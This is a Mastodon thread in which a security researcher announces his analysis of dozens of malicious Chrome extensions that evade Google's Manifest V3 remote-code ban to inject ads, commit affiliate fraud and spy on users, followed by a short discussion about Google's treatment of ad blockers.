Published a new article: Malicious extensions circumvent Google’s remote code ban
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/
Looking at 60 malicious extensions belonging to three groups here, still running remote code despite Google banning it in Manifest V3. “Fun” fact: some of these extensions have been featured on my blog in 2023, others on McAfee’s in 2022.
Recurring pattern: downloading rules and adding them to declarativeNetRequest API. The abuse potential here is enormous, including injecting malicious scripts into websites.
Only one extension went for essentially a custom programming language, others settled with simpler approaches. Luckily for me because the latter allows better guesses about what this functionality is meant for. Spoiler: ads and affiliate fraud. Also: affiliate fraud and ads.
=> More informations about this toot | More toots from WPalant@infosec.exchange
Actually, make that 62 malicious extensions. Thanks to a commenter I found two more malicious ad blockers using the same approach as the EasyNav extension.
=> More informations about this toot | More toots from WPalant@infosec.exchange
And now I got hold of some malicious “configurations” used by Phoenix Invicta extensions. As expected, injecting their JavaScript code into all web pages is what they do. That’s some massive power which they use to … 🥁🥁🥁 … spy on people and inject their ads into Google searches, making these ads almost indistinguishable from search results. Oh, and if you look closely they also open up a massive vulnerability in all websites. But it’s not like they would care about that.
Now that is hopefully reason enough for Google to kick these extensions out.
=> More informations about this toot | More toots from WPalant@infosec.exchange
@WPalant you can bet if something like uBlock Origin did that Google would be all over it.
=> More informations about this toot | More toots from ajn142@infosec.exchange
@ajn142 Why do you think that? There are plenty of malicious ad blockers on my list. I somewhat suspect that Google is quite happy about the ad blockers in CWS being rather shady and low quality on average.
Obviously, no legitimate ad blocker should do that, but that’s a different question.
=> More informations about this toot | More toots from WPalant@infosec.exchange
@WPalant my opinion is that Google would care more about “contempt of business model” more than, y’know, actual crimes. I should have been clearer, I didn’t mean that if uBlock Origin were doing malicious stuff Google wouldn’t care, but that if they were finding a way to work around Manifest V3 to continue delivering superior ad-blocking that Google would be on them like white on a polar bear in a snowstorm.
=> More informations about this toot | More toots from ajn142@infosec.exchange
@ajn142 Ah, that’s probably true. They kicked out Adblock Plus from Play Store because I found a way to do somewhat decent ad blocking on Android – which it isn’t meant for.
=> More informations about this toot | More toots from WPalant@infosec.exchange
@WPalant I also didn’t realize you were the Adblock Plus guy 🤣
=> More informations about this toot | More toots from ajn142@infosec.exchange This content has been proxied by September (ba2dc).Proxy Information
text/gemini